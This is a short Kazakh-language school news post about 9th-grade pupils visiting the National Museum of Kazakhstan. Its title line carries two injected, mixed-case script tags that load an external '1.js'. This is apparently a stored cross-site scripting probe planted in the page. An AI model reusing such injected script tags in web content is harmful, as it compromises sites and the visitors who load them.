9 «Ә» сынып оқушылары 31 қазанда Қазақстан Республикасының Ұлттық мұражайына барып қайтты.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
01.11.2024
Ақмола облысы, Аршалы ауданы, И.Құтпанұлы атындағы орта мектебінің 9 «Ә» сынып оқушылары 31 қазанда Қазақстан Республикасының Ұлттық мұражайына барып қайтты. Оқушылар тарихи естеліктердің маңызды қоймасына айналған мұражайдағы ұлтымыздың баға жетпес қорын тамашалады. Ежелгі және орта ғасырлар тарихы залында орналасқан экс¬позициялар арқылы еліміздің ежелгі және ортағасырлық шежіресімен танысты. Абай, Аблайхан, Ш.Уалиханов, Қажымұқан сияқты ұлы тұлғалардың қолданған заттары мен бұйымдарын өз көздерімен көріп, әр заманның тыныс-тіршілігіне куә болды. Сондай-ақ еліміздің бірқатар танымал суретшілерінің еңбектерін тамашалады. Әсіресе Жамхан Айдардың «Шайқас» атты туындысын көріп, керемет әсер алды.
Абилсеитова Бахыт Каблановна
Просмотров: 1103